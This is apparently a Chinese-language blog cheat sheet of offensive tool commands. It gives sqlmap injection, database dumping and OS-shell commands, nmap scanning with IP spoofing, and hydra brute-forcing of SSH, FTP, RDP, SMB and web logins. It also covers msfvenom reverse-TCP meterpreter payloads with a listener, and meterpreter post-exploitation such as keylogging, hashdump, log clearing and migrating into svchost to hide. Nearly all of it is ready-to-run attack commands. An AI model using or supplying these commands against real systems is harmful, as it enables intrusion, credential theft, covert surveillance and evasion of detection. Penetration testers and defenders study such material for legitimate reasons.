常用攻击工具命令
2023-01-26 22:11:22
# 漏洞挖掘
1. sqlmap
1.1. sqlmap注入检测
功能 | 命令 |
---|---|
GET参数注入 | sqlmap -u “http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1” sqlmap默认测试所有的GET和POST参数,但可以手动用-p参数设置想要测试的参数。例如:-p “id,user-anget” 当使用–level的值很大但是有个别参数不想测试的时候可以使用–skip参数 |
POST参数注入 | sqlmap -u “http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1” –data=”id=1” sqlmap.py -r “c:\Users\fendo\Desktop\post.txt” -p n –dbs (-r表示加载一个文件,-p指定参数) |
cookie注入 (level>=2时才会检测cookie) | sqlmap -u “http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1” –level 2 sqlmap -r “/root/1.txt” (POST注入过程中,用 * 号指定cookie,这样就可以检测cookie。) |
user-agent注入 | sqlmap -u “http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1” –level 3 sqlmap -r “/root/1.txt” (POST注入过程中,用 * 号指定user-agent,这样就可以检测user-agent。) |
referer注入 | sqlmap -u “http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1” –level 3 sqlmap -r root/1.txt” (POST注入过程中,用 * 号指定referer,这样就可以检测referer。) |
host注入 | sqlmap -u “http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1” –level 5 sqlmap -r root/1.txt” (POST注入过程中,用 * 号指定referer,这样就可以检测referer。) |
1.2. sqlmap获取数据库信息
功能 | 命令 |
---|---|
查看数据库 | sqlmap -u “http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1” –dbs –batch |
查看数据库里面的表 | sqlmap -u “http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1” -D security –tables –batch |
查看数据库表里面的列 | sqlmap -u “http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1” -D security -T users –columns –batch |
查看数据库列里面的具体的值 | sqlmap -u “http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1” -D security -T users -C password –dump –batch |
1.3. sqlmap获取shell
sqlmap -u “http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1” –os-shell
2. nmap
2.1. 附加参数介绍
附加参数 | 作用 |
---|---|
-Pn | 防止NMAP的发送初始数据包到目标机器,不检测主机存活 |
-p- | 将扫描所有65535个端口 |
-D | ip地址欺骗 nmap -D RND:5 ip (RND:为生成随机ip地址) |
-p | 指定端口扫描 |
-A | 全面扫描,综合扫描,是一种完整扫描目标信息的扫描方式 |
-O | nmap进行OS探测 |
-sS | TCP、SYN扫描(匿名扫描,默认不加类型,需要root权限,扫描速度快) |
-sT | TCP全连接扫描(不需要root权限,TCP扫描的默认模式,端口状态和SYN相同,耗时长) |
-sU | UDP扫描(扫描DNS,SNMP和DHCP等服务,更慢更困难) |
-sI | 用于闲置扫描和发送数据包欺骗 |
-sV | 指定nmap进行版本探测 |
–version-trace | 显示具体探测细节 |
2.2. 利用脚本扫描
功能 | 命令 |
---|---|
默认脚本扫描,主要搜索各种应用服务的信息,收集后,可再针对具体服务进行攻击 | nmap –script=default 192.168.88.131 |
检查是否存在常见漏洞 | nmap –script=vuln 192.168.1.104 |
提供暴力破解的方式,可对数据库、smb、snmp等进行简单密码的暴力猜解 | nmap –script=brute 192.168.88.131 |
利用FTP指定脚本对目标特定FTP协议进行密码爆破 | nmap –script=ftp-brute.nse 192.168.88.131 |
利用第三方的数据库或资源,例如进行whoise解析 | nmap –script=external 192.168.88.131 |
利用已知的漏洞入侵系统 | exploit |
模糊测试的脚本,发送异常的包到目标机,探测出潜在的漏洞 | fuzzer |
3. hydra
3.1. 附加参数介绍
附加参数 | 作用 |
---|---|
-l | 小写,指定用户名进行破解 |
-L | 大写,指定用户的用户名字典 |
-p | 小写,用于指定密码破解,很少使用,一般采用密码字典 |
-P | 大写,用于指定密码字典 |
-e ns | 额外的选项,n:空密码试探,s:使用指定账户和密码试探 |
-M | 指定目标ip列表文件,批量破解 |
-o | 指定结果输出文件 |
-f | 找到第一对登录名或者密码的时候中止破解 |
-t tasks | 同时运行的线程数,默认是16 |
-w time | 设置最大超时时间,单位 |
-v / -V | 显示详细过程 |
-R | 恢复爆破(如果破解中断了,下次执行 hydra -R /path/to/hydra.restore 就可以继续任务。) |
-x | 自定义密码 |
3.2. 爆破
功能 | 命令 |
---|---|
破解ssh | hydra -l 用户名 -p 密码 -t 线程数 -vV -e ns ip ssh hydra -l 用户名 -p 密码 -t 线程数 -o save.log -vV ip ssh |
破解ftp | hydra -l 用户名 -P 密码 -t 线程(默认16) -vV ip ftp hydra -l 用户名 -P 密码 -e ns -vV ip ftp |
get方式提交,破解web登录 | hydra -l 用户名 -p 密码 -t 线程 -vV -e ns ip http-get /admin/ hydra -l 用户名 -p 密码 -t 线程 -vV -e ns -f ip http-get /admin/index.php |
post方式提交,破解web登录 | hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form “login.php:id=^USER^&passwd=^PASS^: <title> wrong username or password </title>” (10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解, <title> 中的内容是表示错误猜解的返回信息提示。) |
破解https | hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https |
破解teamspeak | hydra -l 用户名 -P 密码 -s 端口号 -vV ip teamspeak |
破解cisco | hydra -P pass.txt 10.36.16.18 cisco hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable |
破解smb | hydra -l administrator -P pass.txt 10.36.16.18 smb |
破解pop3 | hydra -l muts -P pass.txt my.pop3.mail pop3 |
破解rdp | hydra ip rdp -l administrator -P pass.txt -V |
破解http-proxy | hydra -l admin -P pass.txt http-proxy://10.36.16.18 |
破解imap | hydra -L user.txt -p secret 10.36.16.18 imap PLAIN hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN |
4. MSF
4.1. 普通攻击流程
msfconsole
search
相关漏洞
use
exploit
show options
set LHOST
ip
exploit
4.2. 反弹木马
windows32位: msfvenom -p windows/meterpreter/reverse_tcp LHOST=
192.168.223.132
LPORT=12345
-i 5 -f exe -o ~/桌面/test.exewindows64位: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=
192.168.223.132
LPORT=12345
-i 5 -f exe -o ~/桌面/test.exeLinux: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=
x.x.x.x
LPORT=5555
-a x86 –platform Linux -f elf > shell.elf
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST
192.168.1.143
set LPORT
12345
exploit
当靶机运行test.exe文件后,即可在kali 端获取连接
4.2.1 msfvenom 参数说明
参数 | 作用 |
---|---|
-p | 指定需要使用的payload(攻击荷载) |
-f | 指定输出格式 |
-o | 指定创建好的payload的存放位置 |
-i | 指定payload的编码次数 |
-a | 指定payload的目标架构,例如x86 还是 x64 还是 x86_64 |
–platform | 指定payload的目标平台 |
PrependMigrate=true PrependMigrateProc=svchost.exe | 防止太显眼,msfvenom进程migrate,启动两个进程svchost.exe和shell.exe,PrependMigrate=true PrependMigrateProc=svchost.exe将进程默认迁移到svchost.exe中 (也可以写别的进程名) |
4.2.2. meterpreter 一些常用命令
命令 | 作用 |
---|---|
getwd | 当前目录 |
dir | 查看所有文件 |
cat c:\123.txt | |
search -f cmd.exe | 搜索名为cmd.exe文件所在目录 |
upload 要上传的文件 -> 上传到的目录 |
上传文件 |
download 要下载的文件 要下载的目录 |
下载文件 |
clearev | 清除日志 |
getuid | 当前用户 |
ps | 查看所用进程 |
kill | 杀死某个进程 |
sysinfo | 系统信息 |
keyscan_start | 开始键盘记录 |
keyscan_dump | 查看结果 |
keyscan_stop | 停止键盘记录 |
screenshot | 屏幕截图 |
run vnc | 屏幕监控 |
hashdump | 获取密文密码 |
shell | 获取shell |
4.2.2.1 windows
命令 | 作用 |
---|---|
dir | 显示所有文件 |
cd | 切换目录 |
whoami | 查看当前用户级别 |
net user | 查看用户列表 |
net user 用户名 密码 /add | 添加用户 |
net user 用户名 密码 | 更改用户密码 |
5. FOFA
使用方法
语法 | 功能 |
---|---|
title=”beijing” | 从标题中搜索“北京” |
domain=”qq.com” | 搜索根域名带有qq.com的网站 |
host=”qq.com” | 搜索host内所有带有qq.com的域名 |
ip=”58.63.236.248” | 搜索ip相关信息 支持ip段搜索: ip=”111.1.1.1/16” |
port=”6379” | 查找对应“6379”端口的资产 |
body=”网络空间测绘” | 从html正文中搜索“网络空间测绘” |
header=”elastic” | 从http头中搜索“elastic” |
icp=”京ICP证030173号” | 查找备案号为“京ICP证030173号”的网站,搜索网站类型资产 |
cert=”baidu” | 搜索证书(https或者imaps等)中带有baidu的资产 |
server==”Microsoft-IIS/10” | 搜索IIS-10服务器 |
app=”Microsoft-Exchange” | 搜索Microsoft-Exchange设备 |
is_fraud=false | 排除仿冒/欺诈数据 |
is_honeypot=false | 排除蜜罐数据,仅限FOFA高级会员使用 |
os=”centos” | 搜索操作系统为CentOS资产 |
country=”CN” | 搜索指定国家(编码)的资产 |
6. FTP远程连接命令
常用命令
功能 | 命令 |
---|---|
连接FTP服务器 | ftp ip |
下载文件 | a) get remote-file local-file b) mget remote-files |
上传文件 | a) put local-file remote-file b) mput local-files |
断开连接 | bye |